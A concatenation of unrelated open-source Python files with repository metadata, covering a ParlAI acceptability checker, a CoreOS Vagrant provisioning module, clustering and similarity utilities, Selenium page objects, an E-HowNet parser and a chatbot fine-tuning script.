    for the Apprentice, search/knowledge-selection quality for the Wizard.
    """

    def __init__(self):
        # Minimum acceptable knowledge/response token overlap for wizards.
        self.knowledge_overlap_threshold = DEFAULT_KNOWLEDGE_OVERLAP_THRESHOLD
        self.post_stemmer = PorterStemmer()
        super().__init__()

    def check_messages(
        self,
        agent_id: str,
        persona: str,
        messages: List[str],
        is_worker_0: bool,
        violation_types: Iterable[str] = (),
    ) -> str:
        """Run the base checks plus role-specific ones; return a
        comma-joined string of violation labels ('' when clean)."""
        violations = []
        general_chat_violations = super().check_messages(
            self.get_conversation_messages(messages, agent_id),
            is_worker_0,
            violation_types,
        )
        if general_chat_violations:
            violations.extend(general_chat_violations.split(','))

        if agent_id == 'Apprentice':
            persona_violations = bad_persona(persona, self.post_stemmer)
            if persona_violations:
                violations.extend(persona_violations)

        if agent_id == 'Wizard':
            knowledge_violations = poor_knowledge_selection(
                messages, persona, self.post_stemmer, self.knowledge_overlap_threshold
            )
            if knowledge_violations:
                violations.extend(knowledge_violations)

        return ','.join(violations)

    def get_conversation_messages(self, agent_messages, agent_id):
        """Extract the text of *agent_id*'s valid chat messages (search
        queries and empty messages excluded)."""
        return [
            msg['text']
            for msg in agent_messages
            if is_valid_agent_chat_message(msg, agent_id)
        ]
| facebookresearch/ParlAI | parlai/crowdsourcing/projects/wizard_of_internet/acceptability.py | acceptability.py | py | 7,697 | python | en | code | 10,365 | github-code | 36 |
36970594221 | line = [x for x in input().split()]
answer = 0
for i in range(len(line)):
if line.count(line[i]) == 1:
continue
else:
answer = 1
if answer == 0:
print("yes")
else:
print("no")
| jgpstuart/Kattis-Solutions | nodup.py | nodup.py | py | 209 | python | en | code | 0 | github-code | 36 |
27941614537 | from itertools import chain
from itertools import islice
from itertools import repeat
from math import ceil
import numpy as np
from scipy.sparse import issparse
from sklearn.metrics.pairwise import pairwise_distances
from sklearn.metrics.pairwise import pairwise_kernels
from sklearn.neighbors import kneighbors_graph
from sklearn.preprocessing import scale
# Metric names routed to sklearn's pairwise_kernels in the helpers below.
kernels = ["linear", "poly", "polynomial", "rbf", "laplacian", "sigmoid",
           "cosine"]
# Metrics whose similarity is taken as 1 - distance; all other metrics use
# 1 / (1 + distance).
# NOTE(review): "kulsinksi" and "russelrao" look like typos of scipy's
# "kulsinski" / "russellrao" metric names — if so, those metrics never
# match this list; confirm against the supported metric spellings.
oneminus = ["braycurtis", "correlation", "dice", "jaccard", "kulsinksi",
            "rogerstanimoto", "russelrao", "rbf", "chi2", "laplacian",
            "sigmoid"]
def _knn_sim(X, metric=None, n_neighbors=None, p=None,
             metric_params=None):
    """Jaccard similarity computed over the kNN graph of X.

    *metric* selects the distance used to construct the kNN graph itself
    (default euclidean, 5 neighbors)."""
    if n_neighbors is None:
        n_neighbors = 5
    if metric is None:
        metric = "euclidean"
    # Build the distance-weighted kNN graph as a dense array.
    graph = kneighbors_graph(X, n_neighbors, mode="distance",
                             metric=metric, p=p,
                             metric_params=metric_params).toarray()
    return _similarities(graph, metric="jaccard")
def _distances(X1, X2=None, metric=None, metric_params=None):
    """Calls sklearn.pairwise.pairwise_distances or
    sklearn.pairwise_pairwise_kernels and returns the distance
    between X1 and X2.

    Kernel metrics are converted to distances: additive_chi2 is negated,
    other kernels are subtracted from their maximum value.
    NOTE(review): the final pairwise_distances branch ignores
    metric_params — confirm whether that is intended.
    """
    metric = "euclidean" if metric is None else metric
    if metric in kernels:
        if metric == "cosine":
            return pairwise_distances(X1, X2, metric="cosine")
        else:
            if metric_params is None:
                S = pairwise_kernels(X1, X2, metric)
            else:
                S = pairwise_kernels(X1, X2, metric, **metric_params)
            if metric == "additive_chi2":
                # additive_chi2 is non-positive; negation yields a distance.
                return - 1 * S
            else:
                # Convert a similarity kernel to a distance by flipping
                # around its maximum.
                return np.max(S) - S
    elif metric == "knn_jaccard":
        S = _similarities(X1, X2, metric="knn_jaccard",
                          **metric_params)
        return 1 - S
    else:
        return pairwise_distances(X=X1, Y=X2, metric=metric)
def _similarities(X1, X2=None, metric=None, knn_metric=None,
                  n_neighbors=None, p=None, metric_params=None):
    """Calls sklearn.pairwise.pairwise_distances or
    sklearn.pairwise_pairwise_kernels and returns the similarity
    between X1 and X2.
    n_neighbors and p are only for knn_metrics.

    Distance metrics are converted to similarities: 1 - D for metrics in
    ``oneminus``, 1 / (1 + D) otherwise. 'knn_jaccard' is only supported
    for a single matrix (X2 must be None).
    """
    metric = "euclidean" if metric is None else metric
    if metric in kernels:
        if metric_params is None:
            return pairwise_kernels(X1, X2, metric)
        else:
            return pairwise_kernels(X1, X2, metric, **metric_params)
    elif metric == "knn_jaccard":
        if X2 is None:
            return _knn_sim(X1, metric=knn_metric,
                            n_neighbors=n_neighbors, p=p,
                            metric_params=metric_params)
        else:
            # Two-matrix kNN-Jaccard is not implemented; returns None.
            print("Not implemented for two matrices")
            return None
    else:
        D = pairwise_distances(X1, X2, metric)
        if metric in oneminus:
            return 1 - D
        else:
            return 1 / (1 + D)
def _permute(X, n=None, axis=None, seed=None):
"""Permute a frame n times along a given axis."""
X = X.copy()
if (issparse(X)) and (X.getformat() not in ["csr", "csc"]):
X = X.tocsr()
axis = 0 if axis is None else axis
seed = 42 if seed is None else seed
np.random.seed(seed)
indices = np.random.permutation(X.shape[axis])
P = X[:, indices] if axis == 1 else X[indices, :]
return P
def _linreg_get_beta(x, y, scale_exp):
"""Use Scipy linregress to get the regression coefficient."""
from scipy.stats import linregress
if scale_exp is True:
x = scale(x)
return linregress(x, y)[0]
def _chunk_indices(X, n, axis=None):
"""A generator to return n chunks of an array."""
axis = 0 if axis is None else axis
if (axis != 0) and (axis != 1):
print("Please provide a valid axis (0 or 1)")
length = X.shape[0] if axis == 0 else X.shape[1]
size = ceil(length / n)
for i in range(0, length, size):
yield range(length)[i:i + size]
def _make_generator(iterable):
for i in iterable:
yield i
def _chunk_generator(generator, size=None):
    """Yield lazy chunks of *size* consecutive items from *generator*.

    Each chunk chains the current item in front of the next ``size - 1``
    items sliced directly off the source generator, so chunks must be
    consumed in order (and fully) for correct results.
    """
    for g in generator:
        yield chain([g], islice(generator, size - 1))
def _std_sparse(X, axis=None, ddof=None):
    """Per-column (axis=0, default) or per-row (axis=1) standard deviation
    of a sparse matrix, with *ddof* delta degrees of freedom.

    NOTE(review): only the explicitly stored values (``.data``) of each
    slice enter the variance — zeros that are merely implicit in the
    sparse structure are excluded. Confirm this is the intended
    nonzero-only semantics.
    """
    axis = 0 if axis is None else axis
    ddof = 0 if ddof is None else ddof

    def _variance(array):
        # Sample variance with ddof correction over the stored values.
        N = len(array)
        return 1 / (N - ddof) * (np.sum(np.abs(array - array.mean()) ** 2))

    if axis == 0:
        c = X.shape[1]
        var = np.array([_variance(X[:, i].data) for i in range(c)])
        return np.sqrt(var)
    else:
        c = X.shape[0]
        var = np.array([_variance(X[i, :].data) for i in range(c)])
        return np.sqrt(var)
| ohlerlab/SEMITONES | src/SEMITONES/_utils.py | _utils.py | py | 4,987 | python | en | code | 8 | github-code | 36 |
29182985049 | """ShutIt module. See http://shutit.tk
"""
from shutit_module import ShutItModule
class coreos_vagrant(ShutItModule):
    """ShutIt module that provisions a three-node CoreOS cluster with
    Vagrant and VirtualBox, then drops the user into an SSH session on
    the first node.

    The copy-pasted ShutIt API reference comments from the module template
    were removed; see ShutIt's own documentation for the API.
    """

    def build(self, shutit):
        """Check prerequisites, clone coreos-vagrant, configure a 3-node
        cluster with a fresh etcd discovery token, and bring it up."""
        vagrant_dir = shutit.cfg[self.module_id]['vagrant_dir']
        # Refuse to continue while an old coreos-vagrant VM is still running.
        if shutit.send_and_get_output('''VBoxManage list runningvms | grep coreos-vagrant | grep -v 'not created' | awk '{print $1}' ''') != '':
            if shutit.get_input('Clean up your VMs first, as there appears to be a running coreos-vagrant VM in existence. Want me to clean them up for you (y/n)?',boolean=True):
                shutit.multisend('(cd coreos-vagrant && vagrant destroy)',{'y/N':'y'})
        # Three CoreOS VMs need roughly 3.5 GB of free memory.
        memavail = shutit.get_memory()
        if memavail < 3500000:
            if not shutit.get_input('Memory available appears to be: ' + str(memavail) + 'kB, need 3500000kB available to run.\nIf you want to continue, input "y", else "n"',boolean=True):
                shutit.fail('insufficient memory')
        shutit.send('cd')
        # Offer to install any missing host tools.
        for c in ('virtualbox','git','curl'):
            if not shutit.command_available(c):
                if shutit.get_input(c + ' apparently not installed. Would you like me to install it for you?',boolean=True):
                    pw = shutit.get_input('Please input your sudo password in case it is needed.',ispass=True)
                    command = shutit.get_input('Please input your install command, eg "apt-get install -y", or "yum install -y"')
                    shutit.multisend('sudo ' + command + ' ' + c,{'assword':pw})
        if not shutit.command_available('vagrant'):
            shutit.send('wget -qO- https://dl.bintray.com/mitchellh/vagrant/vagrant_1.7.2_x86_64.deb > /tmp/vagrant.deb',note='Downloading vagrant and installing')
            shutit.send('dpkg -i /tmp/vagrant.deb')
            shutit.send('rm /tmp/vagrant.deb')
        shutit.send('mkdir -p ' + vagrant_dir)
        shutit.send('cd ' + vagrant_dir)
        shutit.send('cd')
        shutit.send('rm -rf coreos-vagrant')
        shutit.send('git clone https://github.com/coreos/coreos-vagrant.git',note='Get the coreos-vagrant github repo')
        shutit.send('cd coreos-vagrant')
        # Get coreos id discovery token
        token = shutit.send_and_get_output('curl https://discovery.etcd.io/new')
        shutit.send('cp user-data.sample user-data')
        shutit.replace_text('''    discovery: ''' + token,'user-data','.*#discovery:.*')
        # update with token
        shutit.send('cp config.rb.sample config.rb')
        shutit.replace_text('$num_instances=3','config.rb','^.num_instances=.*$')
        shutit.send('vagrant up')
        # Wait until all three nodes report as running.
        shutit.send_until('vagrant status','core-01.*running')
        shutit.send_until('vagrant status','core-02.*running')
        shutit.send_until('vagrant status','core-03.*running')
        shutit.login(command='vagrant ssh core-01')
        shutit.pause_point('You are now in your coreos cluster! Enjoy!\n\nIf you want to start again, ctrl-d once to get out of this coreos machine, run "vagrant destroy" and then re-run.')
        shutit.logout()
        return True

    def get_config(self, shutit):
        """Declare the module's configuration items (vagrant working directory)."""
        shutit.get_config(self.module_id, 'vagrant_dir', '/tmp/vagrant_dir')
        return True

    def test(self, shutit):
        """No test-cycle checks for this module."""
        # For test cycle part of the ShutIt build.
        return True

    def finalize(self, shutit):
        """No cleanup required at the end of the build."""
        return True

    def is_installed(self, shutit):
        """Always rebuild: installation state is not tracked."""
        return False
def module():
    """ShutIt entry point: return the configured coreos_vagrant module.

    NOTE(review): ``delivery_methods=('bash')`` is a plain string, not a
    one-element tuple — confirm whether ``('bash',)`` was intended.
    """
    return coreos_vagrant(
        'shutit.coreos_vagrant.coreos_vagrant.coreos_vagrant',
        1308628950.00,
        description='',
        maintainer='',
        delivery_methods=('bash'),
        depends=['shutit.tk.setup'],
    )
| ianmiell/shutit-coreos-vagrant | coreos_vagrant.py | coreos_vagrant.py | py | 7,151 | python | en | code | 2 | github-code | 36 |
71079803305 | import gzip
import json
import numpy as np
import pandas as pd
from tqdm.notebook import tqdm
from datetime import datetime
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import KMeans
from collections import Counter
#Funciones.
def jl_to_list(fname):
    """Read a gzipped JSON-lines file and return the parsed records as a list."""
    with gzip.open(fname, 'rb') as handle:
        return [json.loads(line) for line in handle]
def load_item_data(all_itms = False):
    """Load 'item_data.csv' and index selected fields per item.

    Replaces product_id 0 with -1 as a "no product" sentinel and factorizes
    domain_id / category_id into integer codes. Returns (metadata, all_items)
    where metadata maps item_id -> dict of the selected fields, and
    all_items is the list of item ids (empty unless *all_itms* is True).
    """
    ITEM_DATA = pd.read_csv('item_data.csv', sep=';')
    ITEM_DATA.loc[ITEM_DATA['product_id'] == 0, 'product_id'] = -1
    ITEM_DATA['domain_code'], domain_uniques = pd.factorize(ITEM_DATA['domain_id'], sort=True)
    ITEM_DATA['category_code'], category_uniques = pd.factorize(ITEM_DATA['category_id'], sort=True)
    fields = ['item_id', 'domain_id', 'domain_code', 'product_id', 'category_id', 'category_code', 'price', 'price_cluster', 'condition', 'mexico']
    # Column-major snapshot of the fields, then pivot into one dict per item.
    m = {}
    for column in tqdm(fields):
        m[column] = list(ITEM_DATA[column])
    metadata = {}
    for i, j in tqdm(enumerate(m['item_id'])):
        metadata[j] = {}
        for column in fields:
            metadata[j].update({column: m[column][i]})
    if all_itms:
        all_items = list(metadata)
    else:
        all_items = []
    return metadata, all_items
def views(row):
    """Item ids of all 'view' events in the row's user history."""
    history = row['user_history']
    return [ev['event_info'] for ev in history if ev['event_type'] == 'view']
def searchs(row):
    """Search queries of all 'search' events in the row's user history."""
    history = row['user_history']
    return [ev['event_info'] for ev in history if ev['event_type'] == 'search']
def dominios_visitados(visits):
    """Counter of domain_code frequencies over the visited items
    (looked up in the module-level metadata)."""
    return Counter(metadata[item]['domain_code'] for item in visits)
def productos_visitados(visits):
    """Counter of product_id frequencies over visited items; falsy ids are skipped."""
    return Counter(
        metadata[item]['product_id']
        for item in visits
        if metadata[item]['product_id']
    )
def categorias_visitadas(visits):
    """Counter of category_code frequencies over visited items; falsy codes are skipped."""
    return Counter(
        metadata[item]['category_code']
        for item in visits
        if metadata[item]['category_code']
    )
def get_session_time(history):
    """Elapsed seconds between the first and last event of *history*.

    Timestamps look like '2020-01-01T10:00:00.000000+0000'; the 'T'
    separator is replaced and the trailing 5-character UTC offset dropped
    before parsing.
    """
    fmt = '%Y-%m-%d %H:%M:%S.%f'

    def _parse(event):
        return datetime.strptime(event['event_timestamp'].replace('T', ' ')[:-5], fmt)

    delta = _parse(history[-1]) - _parse(history[0])
    return delta.days * 24 * 60 * 60 + delta.seconds + delta.microseconds / 1000000
def precio_mediano(visits):
    """Median price over visited items that have a truthy price; 0 when none do."""
    precios = [float(metadata[item]['price'])
               for item in visits if metadata[item]['price']]
    if not precios:
        return 0
    return np.median(np.array(precios))
def precio_desvio(visits):
    """Standard deviation of prices over visited items that have a truthy
    price; 0 when none do."""
    precios = [float(metadata[item]['price'])
               for item in visits if metadata[item]['price']]
    if not precios:
        return 0
    return np.std(np.array(precios))
def mercado(visits):
    """1 when more than half of the visited items are flagged 'mexico', else 0."""
    flags = np.array([int(metadata[item]['mexico']) for item in visits])
    return 1 if np.mean(flags) > 0.5 else 0
def data_for_clusters(rows_data):
    """Build the per-session clustering feature table.

    One row per session: distinct domains/products/categories viewed,
    session duration and length, view count and ratio, median and std of
    viewed prices, and the Mexico-market flag.
    """
    cluster_data = []
    for row in tqdm(rows_data):
        temp = {'d_visitados': len(dominios_visitados(views(row))),
                'p_visitados': len(productos_visitados(views(row))),
                'c_visitadas': len(categorias_visitadas(views(row))),
                's_time': get_session_time(row['user_history']),
                's_len': len(row['user_history']),
                'v_len': len(views(row)),
                'p_views': len(views(row)) / len(row['user_history']),
                'median_p': precio_mediano(views(row)),
                'sd_p': precio_desvio(views(row)),
                'mercado': mercado(views(row))}
        cluster_data.append(temp)
    return pd.DataFrame(cluster_data)
def data_for_segments(rows_data):
    """Per-session view and search event counts, as a DataFrame."""
    cluster_data = []
    for row in tqdm(rows_data):
        temp = {'v_len': len(views(row)),
                's_len': len(searchs(row))}
        cluster_data.append(temp)
    return pd.DataFrame(cluster_data)
def data_for_features(rows_data):
    """Per-session feature table keeping the raw visited code lists
    (domains, products, categories) plus price stats and market flag."""
    cluster_data = []
    for row in tqdm(rows_data):
        temp = {'domain_code': list(dominios_visitados(views(row))),
                'product_id': list(productos_visitados(views(row))),
                'category_code': list(categorias_visitadas(views(row))),
                'median_p': precio_mediano(views(row)),
                'sd_p': precio_desvio(views(row)),
                'mercado': mercado(views(row))}
        cluster_data.append(temp)
    return pd.DataFrame(cluster_data)
def dominio_mas_visitado(rows_data):
    """One-column DataFrame with each session's first-seen visited domain
    code, or -1 for sessions with no views.

    NOTE(review): list(Counter) yields keys in *insertion* order, so this
    is the first domain encountered, not necessarily the most visited —
    confirm against the function name's intent.
    """
    cluster_data = []
    for row in tqdm(rows_data):
        dominios = list(dominios_visitados(views(row)))
        if len(dominios) > 0:
            temp = {'vdomain': list(dominios_visitados(views(row)))[0]}
        else:
            temp = {'vdomain': -1}
        cluster_data.append(temp)
    return pd.DataFrame(cluster_data)
def clustering_process(df, k):
    """Standardize *df*, run KMeans with *k* clusters, and return the
    cluster assignments (one-column DataFrame) plus the fitted model.

    Fix: removed a dead ``pd.concat`` that built an unused ``df_final``.
    NOTE(review): the model is fitted twice (``fit`` then ``fit_predict``);
    kept as-is to preserve RNG behavior, but one call would suffice.
    """
    # Normalization.
    df_norm = StandardScaler().fit_transform(df)
    # Result structure.
    cs = np.empty(shape=[len(df_norm), 1])
    # Algorithm.
    kmeans = KMeans(n_clusters=k)
    kmeans.fit(df_norm)
    cs[:, 0] = kmeans.fit_predict(df_norm)
    df_cs = pd.DataFrame(cs, columns=['cluster'])
    if k <= 100:
        print(df_cs['cluster'].value_counts())
    return df_cs, kmeans
def clustering_predict(df, kmeans, k=10):
    """Standardize *df*, label it with *kmeans*, and return *df* with a
    'cluster' column appended (prints value counts when k <= 100).

    NOTE(review): this calls ``kmeans.fit_predict``, which RE-FITS the
    model on the new data. If the intent is to label new data with the
    already-trained model, ``kmeans.predict`` would be expected — confirm.
    """
    # Normalization.
    df_norm = StandardScaler().fit_transform(df)
    # Result structure.
    cs=np.empty(shape=[len(df_norm),1])
    # Algorithm.
    cs[:,0]=kmeans.fit_predict(df_norm)
    # Concat.
    df_cs=pd.DataFrame(cs,columns=['cluster'])
    df_final=pd.concat([df,df_cs],axis=1)
    if k <= 100:
        print(df_final['cluster'].value_counts())
    return df_final
def meli_clusters(k):
    """Load 'meli_data.csv' and cluster it into *k* groups.

    Returns (cluster assignments DataFrame, fitted KMeans model).
    """
    df = pd.read_csv('meli_data.csv', sep=';')
    df_c, kmeans = clustering_process(df, k)
    return df_c, kmeans
# Data: module-level item metadata, loaded once at import time
# (the second return value, the item-id list, is discarded).
metadata, _ = load_item_data()
14112986280 | import os
import allure
import pytest
import logging
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
import allure
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.chrome.options import Options
class BasePage:
    """Base page object: wraps a WebDriver and provides shared assertions."""

    def __init__(self, driver):
        self.driver = driver

    @allure.step("Проверка URL: {expected_url}")
    def check_url(self, expected_url):
        """Assert that the browser's current URL equals *expected_url*, then log it."""
        assert self.driver.current_url == expected_url
        logging.info(
            f"Проверка URL: Ожидаемый URL - {expected_url}, "
            f"текущий URL - {self.driver.current_url}"
        )
class SbisHomePage(BasePage):
    """Page object for the SBIS landing page."""

    URL = "https://sbis.ru/"

    @allure.step("Переход в раздел 'Контакты'.")
    def go_to_contacts(self):
        """Open the 'Contacts' section via the site header menu link."""
        header_menu = self.driver.find_element(
            By.CLASS_NAME,
            "sbisru-Header__menu.ws-flexbox.ws-align-items-center"
        )
        contacts_link = header_menu.find_element(By.LINK_TEXT, "Контакты")
        contacts_link.click()
        logging.info("Переход на страницу 'Контакты' выполнен.")
@pytest.fixture
def browser():
    """Yield a Chrome WebDriver configured to download silently into ./downloads."""
    download_folder = os.path.join(os.path.dirname(__file__), 'downloads')
    chrome_options = Options()
    # Route downloads to a local folder without prompts or safe-browsing blocks.
    chrome_options.add_experimental_option('prefs', {
        'download.default_directory': download_folder,
        'download.prompt_for_download': False,
        'download.directory_upgrade': True,
        'safebrowsing.enabled': False,
        'profile.default_content_settings.popups': 0
    })
    # Reduce UI noise and disable interstitials that interfere with tests.
    chrome_options.add_argument('--disable-notifications')
    chrome_options.add_argument('--disable-infobars')
    chrome_options.add_argument('--disable-software-rasterizer')
    chrome_options.add_argument('--safebrowsing-disable-download-protection')
    chrome_options.add_argument('--disable-web-security')
    driver = webdriver.Chrome(options=chrome_options)
    yield driver
    # Teardown: always quit the browser after the test.
    driver.quit()
def close_cookie_message(driver, class_name):
try:
close_cookie_message = driver.find_element(By.CLASS_NAME, class_name)
if close_cookie_message.is_displayed():
close_cookie_message.click()
logging.info("Закрытие сообщения о куки выполнено.")
except NoSuchElementException:
pass
| nasretdinovs/tensor_autotest | common.py | common.py | py | 2,451 | python | en | code | 0 | github-code | 36 |
42882353355 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Please refer the tutorial ":ref:`tutorial-parse_parser`".
"""
# pylint: disable=invalid-name, no-self-use
__author__ = "Mu Yang <http://muyang.pro>"
__copyright__ = "2018-2021 CKIP Lab"
__license__ = "GPL-3.0"
import re
from wcwidth import wcswidth
from ply.lex import lex
from ply.yacc import yacc
from .node import (
EhnParseAnchor,
EhnParseAnyPlaceholder,
EhnParseCoindexReference,
EhnParseFunction,
EhnParseFunctionEntity,
EhnParseFunctionFeature,
EhnParseNameEntity,
EhnParseNormalEntity,
EhnParseNormalFeature,
EhnParseNumberEntity,
EhnParseRestrictionPlaceholder,
EhnParseSubject,
EhnParseSubjectReference,
EhnParseTildeReference,
)
################################################################################################################################
# Core
#
EHN_TOKENS_CHAR = {
"QUOTE": '"',
"EQUAL": "=",
"COLON": ":",
"COMMA": ",",
"SLASH": "/",
"ULINE": "_",
"LPAREN": "(",
"RPAREN": ")",
"LBRACE": "{",
"RBRACE": "}",
"TILDE": "~",
}
EHN_TOKENS = ["TEXT", "NUMBER", "COINDEX", "COINDEX0", *EHN_TOKENS_CHAR.keys()]
class EhnSyntaxError(SyntaxError):
"""E-HowNet Syntax Error."""
def __init__(self, *args, pos=None):
super().__init__(*args)
self.pos = pos
def show_pos(self, text):
"""Show error position.
Parameters
----------
text
original input text
"""
return " " * wcswidth(text[: self.pos]) + "^"
################################################################################################################################
# Lexer
#
class _EhnLexer:
def __init__(self, **kwargs):
self._lexer = lex(module=self, **kwargs)
tokens = EHN_TOKENS
# Skip all spaces
# t_ignore = ' \t\n\r\f\v'
# Default state tokens
t_QUOTE = r'"'
t_EQUAL = r"="
t_COLON = r":"
t_COMMA = r","
t_SLASH = r"/"
t_ULINE = r"_"
t_LPAREN = r"\("
t_RPAREN = r"\)"
t_LBRACE = r"{"
t_RBRACE = r"}"
t_TILDE = r"~"
def t_ANY_error(self, t):
raise EhnSyntaxError(f"Illegal character ‘{t.value[0]}’ at position {t.lexpos}.", pos=t.lexpos)
# t.lexer.skip(1)
def t_TEXT(self, t):
r"[A-Za-z0-9\x80-\U0010FFFF|#+\-.?]+"
if _isnumber(t.value):
t.type = "NUMBER"
elif t.value == "x?":
t.type = "COINDEX0"
elif _is_coindex(t.value):
t.type = "COINDEX"
else:
match = re.search(r"[+\-.?]", t.value)
if match:
pos = t.lexpos + match.start()
raise EhnSyntaxError(f"Illegal character ‘{match.group(0)}’ at position {pos}.", pos=pos)
return t
# Invoke the lexer
def __call__(self, data):
self._lexer.input(data)
return iter(self._lexer)
class EhnLexer(_EhnLexer):
"""E-HowNet Lexer.
.. method:: __call__(self, data)
Run tokenization.
"""
################################################################################################################################
# Parser
#
class _EhnParser:
def __init__(self, lexer=None, **kwargs):
if lexer is not None:
assert isinstance(lexer, EhnLexer), f"{lexer} is not an EhnLexer!"
self.lexer = lexer
else:
self.lexer = EhnLexer()
self._parser = yacc(module=self, **kwargs)
@property
def _lexer(self):
return self.lexer._lexer # pylint: disable=protected-access
tokens = EHN_TOKENS
# Define the parser
def p_error(self, t):
if t is None:
msg = "Unexpected ending."
pos = None
else:
msg = f"Unexpected symbol ‘{t.value}’ at position {t.lexpos}."
pos = t.lexpos
syms = []
for sym in self._parser.action[self._parser.state].keys():
sym = EHN_TOKENS_CHAR.get(sym, sym)
if sym == "$end":
syms.append("‘ENDING’")
else:
syms.append(f"‘{sym}’")
if len(syms) > 1:
syms[-1] = "or " + syms[-1]
msg += f' Expecting a {", ".join(syms)}.'
raise EhnSyntaxError(msg, pos=pos)
# Object
def p_expr(self, p):
"""expr : entity
| subject"""
p[0] = p[1]
# Subject
def p_subject(self, p):
"""subject : feature
| subject COMMA feature"""
if len(p) == 2:
p[0] = EhnParseSubject(p[1])
else:
p[1].add_feature(p[3])
p[0] = p[1]
# Entity
def p_entity_number(self, p):
"""entity : LBRACE NUMBER RBRACE"""
p[0] = EhnParseNumberEntity(p[2])
def p_entity_name(self, p):
"""entity : LBRACE QUOTE TEXT QUOTE RBRACE"""
p[0] = EhnParseNameEntity(p[3])
def p_entity_normal_open(self, p):
"""entityOpen : LBRACE TEXT"""
p[0] = EhnParseNormalEntity(p[2])
def p_entity_function_open(self, p):
"""entityOpen : LBRACE function"""
p[0] = EhnParseFunctionEntity(p[2])
def p_entity_anchor(self, p):
"""entityAnchor : entityOpen anchor"""
p[1].anchor = p[2]
p[0] = p[1]
def p_entity_feature0(self, p):
"""entityFeature : entityOpen COLON feature
| entityAnchor COLON feature"""
p[1].add_feature(p[3])
p[0] = p[1]
def p_entity_feature(self, p):
"""entityFeature : entityFeature COMMA feature"""
p[1].add_feature(p[3])
p[0] = p[1]
def p_entity_close(self, p):
"""entity : entityOpen RBRACE
| entityAnchor RBRACE
| entityFeature RBRACE"""
p[0] = p[1]
# Reference
def p_reference_coindex(self, p):
"""reference : LBRACE COINDEX RBRACE"""
p[0] = EhnParseCoindexReference(p[2])
def p_reference_subject(self, p):
"""reference : LBRACE COINDEX0 RBRACE"""
p[0] = EhnParseSubjectReference()
def p_reference_tilde(self, p):
"""reference : LBRACE TILDE RBRACE"""
p[0] = EhnParseTildeReference()
# Placeholder
def p_restriction(self, p):
"""restriction : SLASH entity
| SLASH reference"""
p[0] = EhnParseRestrictionPlaceholder(p[2])
def p_restriction_anchor(self, p):
"""restriction : SLASH entity anchor
| SLASH reference anchor"""
p[0] = EhnParseRestrictionPlaceholder(p[2], anchor=p[3])
def p_any(self, p):
"""any : LBRACE RBRACE"""
p[0] = EhnParseAnyPlaceholder()
# Feature
def p_feature(self, p):
"""feature : TEXT EQUAL entity
| TEXT EQUAL reference
| TEXT EQUAL restriction
| TEXT EQUAL any"""
p[0] = EhnParseNormalFeature(p[1], p[3])
def p_function_feature(self, p):
"""feature : function EQUAL entity
| function EQUAL reference
| function EQUAL restriction
| function EQUAL any"""
p[0] = EhnParseFunctionFeature(p[1], p[3])
# Function
def p_function_any(self, p):
"""function : TEXT LPAREN RPAREN"""
p[0] = EhnParseFunction(p[1], EhnParseAnyPlaceholder())
def p_function_restriction(self, p):
"""function : TEXT LPAREN restriction RPAREN"""
p[0] = EhnParseFunction(p[1], p[3])
def p_function_open(self, p):
"""functionOpen : TEXT LPAREN entity
| TEXT LPAREN reference"""
p[0] = EhnParseFunction(p[1], p[3])
def p_function_argument(self, p):
"""functionArgument : functionOpen COMMA entity
| functionOpen COMMA reference
| functionArgument COMMA entity
| functionArgument COMMA reference"""
p[1].add_argument(p[3])
p[0] = p[1]
def p_function_close(self, p):
"""function : functionOpen RPAREN
| functionArgument RPAREN"""
p[0] = p[1]
# Anchor
def p_anchor(self, p):
"""anchor : ULINE COINDEX"""
p[0] = EhnParseAnchor(p[2])
# Invoke the parser
def __call__(self, data: str, *args, debug=False, **kwargs):
if debug:
print(data)
for tok in self.lexer(data):
print(tok)
ret = self._parser.parse(data, lexer=self._lexer, *args, debug=debug, **kwargs)
return ret
class EhnParser(_EhnParser):
"""E-HowNet Parser.
.. method:: __call__(self, data: str)
Run parsing.
"""
################################################################################################################################
# Utility
#
def _isnumber(name):
try:
float(name)
return True
except ValueError:
return False
def _is_coindex(name):
return _is_coindex.pattern.match(name)
_is_coindex.pattern = re.compile(r"x[0-9]*")
| ckiplab/ehownet | ehn/parse/parser.py | parser.py | py | 8,932 | python | en | code | 10 | github-code | 36 |
71938312423 | # Definition of dictionary
europe = {'spain': 'madrid', 'france': 'paris', 'germany': 'berlin',
'norway': 'oslo', 'italy': 'rome', 'poland': 'warsaw', 'austria': 'vienna'}
# Iterate over europe
for key, value in europe.items():
print("the capital of " + key + " is " + value)
#Iterating over Dataframe
#Printing labels and each row as a series
import pandas as pd
new_york_demo = pd.read_csv('Demographic_Statistics_By_Zip_Code.csv', index_col=0)
for lab,row in new_york_demo.iterrows():
print(lab)
print(row)
#Iterate and Print a specific column
#itter does create a new pandas series on each iteration == INEFFICIENT
for lab, row in new_york_demo.iterrows() :
print(str(lab)+": "+ str(row['COUNT GENDER TOTAL']))
#Adding a new calculated column and appying a function
for lab, row in new_york_demo.iterrows():
new_york_demo.loc[lab, "count_gender_total"] = row['COUNT GENDER TOTAL']/2
print(new_york_demo)
#Using apply function - be careful with methods and functions
new_york_demo["Percent Gender Total"] = new_york_demo['PERCENT GENDER TOTAL']/2
#new_york_demo["Percent Gender Total"] = new_york_demo['PERCENT GENDER TOTAL'].apply(some function)
| AlucarD980/d4t4-c4mp | Looping Data Structures.py | Looping Data Structures.py | py | 1,187 | python | en | code | 0 | github-code | 36 |
30438808856 | """
TFE - Chatbot Tifi - Technifutur
by Nicolas Christiaens
"""
from datasets import Dataset
from FineTuning import STSBTrainingModel
from torch.utils.data import DataLoader
import pandas as pd
from Preprocessing import Preprocessing
from transformers import AdamW,get_constant_schedule
from transformers import AutoModel,AutoTokenizer,Trainer
import torch
from tqdm.auto import tqdm
# Load the custom dataset and make our preprocessing
def getCustomDS(file="customDS.xlsx"):
df = pd.read_excel(file)
df["sentence1"] = df["sentence1"].apply(Preprocessing)
df["sentence2"] = df["sentence2"].apply(Preprocessing)
df["score"] = df["score"].astype(float)
dataset = Dataset.from_pandas(df)
return dataset
if __name__ == "__main__":
# Inform the user if no GPU is detected
if torch.cuda.is_available() is True:
device = "cuda"
else:
print("Pas de GPU pour le training")
# Read the custom dataset
train = getCustomDS()
# Set Global Parameters
max_length = 128
model_name = "Model_SentenceEmbedding/Finetuning/Final_model"
model_save = "Model_SentenceEmbedding/Custom/Final_model"
batch_size = 16
learning_rate = 2e-5
weight_decay = 0.01
